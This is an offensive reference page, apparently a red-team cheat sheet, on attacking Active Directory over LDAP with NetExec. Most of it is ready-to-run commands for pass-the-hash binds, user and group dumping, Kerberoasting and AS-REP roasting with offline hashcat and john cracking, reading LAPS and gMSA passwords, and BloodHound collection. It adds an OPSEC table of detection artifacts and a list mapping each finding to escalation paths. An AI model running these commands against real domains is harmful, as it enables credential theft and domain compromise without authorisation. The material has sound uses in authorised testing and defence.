LDAP Operations with NetExec
#Overview
LDAP (389/TCP, 636/TCP for LDAPS) is the directory access protocol for Active Directory. NetExec's LDAP module enables domain enumeration, credential validation, Kerberoasting, AS-REP roasting, and enumeration of ADCS, LAPS, gMSA, delegation, and trust configurations — all without touching SMB or requiring local admin rights.
LDAP operations are often lower-noise than SMB equivalents and work with standard domain user credentials (no admin required for most queries).
#Prerequisites
- Network access to Domain Controller on LDAP (389/TCP) or LDAPS (636/TCP)
- Valid domain credentials (or anonymous bind if enabled)
- NetExec installed
#Credential Validation
# Validate domain credentials via LDAP
netexec ldap 10.10.10.5 -u user -p pass
# [+] → valid credentials
# [-] → invalid
# Domain context (explicit)
netexec ldap 10.10.10.5 -u user -p pass -d domain.local
# Pass-the-hash via LDAP (NTLM bind)
netexec ldap 10.10.10.5 -u user -H ':NTHASH'
# LDAPS (SSL)
netexec ldap 10.10.10.5 -u user -p pass --port 636
BASH
#User and Group Dumping
# Dump all domain users
netexec ldap 10.10.10.5 -u user -p pass --users
# Output: username, display name, email, description, last logon, groups
# Dump all domain groups with members
netexec ldap 10.10.10.5 -u user -p pass --groups
# Output: group name, scope, members
# Filter users by attribute
netexec ldap 10.10.10.5 -u user -p pass --users --filter "(&(objectClass=user)(adminCount=1))"
# Returns only protected/admin users
# Dump specific OU
netexec ldap 10.10.10.5 -u user -p pass --users --base-dn "OU=Finance,DC=domain,DC=local"
BASH
#Kerberoasting
# Kerberoast all users with SPNs
netexec ldap 10.10.10.5 -u user -p pass --kerberoasting kerberoast.txt
# Output file: kerberoast.txt (hashcat mode 13100 format)
# Kerberoasting with hash output
netexec ldap 10.10.10.5 -u user -H ':NTHASH' --kerberoasting kerberoast.txt
# Crack offline
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force
john kerberoast.txt --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt
BASH
#AS-REP Roasting
# Find and roast users with "Do not require Kerberos preauthentication" set
netexec ldap 10.10.10.5 -u user -p pass --asreproast asrep.txt
# Output file: asrep.txt (hashcat mode 18200 format)
# AS-REP roasting without credentials (if anonymous LDAP is allowed)
netexec ldap 10.10.10.5 -u '' -p '' --asreproast asrep.txt
# Crack offline
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force
john asrep.txt --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt
BASH
#ADCS Enumeration
# Enumerate Active Directory Certificate Services
netexec ldap 10.10.10.5 -u user -p pass -M adcs
# Lists: CA servers, certificate templates, vulnerable templates (ESC1–ESC15)
# Critical for planning ADCS attack paths
# Check specific template
netexec ldap 10.10.10.5 -u user -p pass -M adcs -o TEMPLATE='WebServer'
BASH
#LAPS and gMSA
# Check which computers have LAPS enabled
netexec ldap 10.10.10.5 -u user -p pass -M laps
# Lists: computers with LAPS, password expiration, password visibility
# Read LAPS password (requires LAPS read permission)
netexec ldap 10.10.10.5 -u laps_reader -p pass -M laps -o READ=true
# Enumerate gMSA (Group Managed Service Accounts)
netexec ldap 10.10.10.5 -u user -p pass --gmsa
# Lists: gMSA accounts, associated hosts, password retrieval permission
# Read gMSA password (requires permission on the gMSA object)
netexec ldap 10.10.10.5 -u gmsa_reader -p pass --gmsa -o READ=true
BASH
#Delegation Enumeration
# Find all delegation types
netexec ldap 10.10.10.5 -u user -p pass -M delegation
# Unconstrained delegation: computer can impersonate ANY user who authenticates to it
# Constrained delegation: computer can impersonate specific users TO specific services
# RBCD (Resource-Based Constrained Delegation): computer can be delegated TO by specified accounts
# Find users trusted for delegation
netexec ldap 10.10.10.5 -u user -p pass --trusted-for-delegation
# These accounts can request TGTs on behalf of any user — high-value targets
# Find users with constrained delegation
netexec ldap 10.10.10.5 -u user -p pass --constrained-delegation
BASH
#Domain Trusts and Topology
# Enumerate domain trusts
netexec ldap 10.10.10.5 -u user -p pass --trusts
# Shows: trusted domains, trust direction, trust type, SID filtering status
# Enumerate subnets (AD Sites and Services)
netexec ldap 10.10.10.5 -u user -p pass --subnets
# Shows: subnet definitions, associated sites, location information
# Machine Account Quota (MAQ)
netexec ldap 10.10.10.5 -u user -p pass --maq
# Default: 10 (any domain user can create up to 10 machine accounts)
# If > 0: you can create a machine account for RBCD attacks
BASH
#BloodHound Collection
# Collect BloodHound data via LDAP (no on-target execution needed)
netexec ldap 10.10.10.5 -u user -p pass -M bloodhound
# Output: BloodHound-compatible JSON files
# Collection: users, groups, computers, ACLs, sessions, trusts, GPOs
# With specific collection methods
netexec ldap 10.10.10.5 -u user -p pass -M bloodhound -o COLLECTION_METHOD='ACL,Group,Trusts,ObjectProps'
# Import into BloodHound CE
# Upload JSON files via BloodHound CE web UI (http://localhost:8080)
BASH
#Advanced LDAP Queries
# Custom LDAP filter
netexec ldap 10.10.10.5 -u user -p pass --filter "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
# Finds users with "Password never expires" flag
# Find users with old passwords (pwdLastSet > 90 days)
netexec ldap 10.10.10.5 -u user -p pass --users | grep -E "pwdLastSet.*202[0-3]"
# Find disabled users (potential re-enable targets)
netexec ldap 10.10.10.5 -u user -p pass --filter "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))"
# Find computers with old OS versions
netexec ldap 10.10.10.5 -u user -p pass --filter "(&(objectClass=computer)(operatingSystem=*Server 2008*))"
BASH
#Common Pitfalls
- ⚠️ Anonymous LDAP disabled: Most domains disable anonymous LDAP binds. You'll need at least a low-privileged domain user credential for most operations.
- ⚠️ LDAP channel binding: DCs with LDAP channel binding enabled block NTLM-based LDAP binds (pass-the-hash over LDAP won't work). Use Kerberos authentication instead.
- ⚠️ LDAPS required: Some domains enforce LDAPS (636/TCP) and reject plaintext LDAP. Use
--port 636flag. - ⚠️ Rate limiting: DCs may throttle excessive LDAP queries. Add jitter (
-j 2) for large enumeration jobs.
#OPSEC Considerations
| Operation | Noise Level | Artifacts |
|---|---|---|
| Credential validation | Low | LDAP bind event |
| User/group dump | Low | Standard LDAP read queries |
| Kerberoasting | Medium | TGS-REQ for each SPN (4769 on DC) |
| AS-REP roasting | Low | AS-REQ without preauth (4768 on DC) |
| ADCS enumeration | Low | LDAP reads on CA/template objects |
| LAPS/gMSA read | Low | LDAP read on specific attributes |
| BloodHound collection | Medium | High volume LDAP queries over short period |
| Delegation enumeration | Low | LDAP reads on computer/user objects |
#Post-Exploitation Value
- User list → password spray targets, Kerberoasting candidates
- Group memberships → identify Domain Admins, privileged groups
- Kerberoastable accounts → offline cracking → plaintext credentials
- AS-REP roastable accounts → offline cracking (no credentials needed)
- ADCS vulnerable templates → certificate-based privilege escalation
- LAPS passwords → local admin on specific computers
- gMSA passwords → service account compromise
- Delegation targets → privilege escalation via impersonation
- Trust relationships → cross-forest attack paths
- BloodHound data → graph-based attack path analysis
#Cross-References
- SMB Operations — Complementary host-level enumeration
- AD Attacks via NetExec — Full attack chains
- Kerberoasting — Detailed Kerberoasting technique
- AS-REP Roasting — Detailed AS-REP technique
- ADCS Exploitation — Certificate attack details
- ACL Abuse — Exploiting LDAP ACL misconfigurations
- LDAP Enumeration — Manual LDAP enumeration
#Tool References
- NetExec LDAP Documentation
- BloodHound CE
- certipy-ad — ADCS attack tool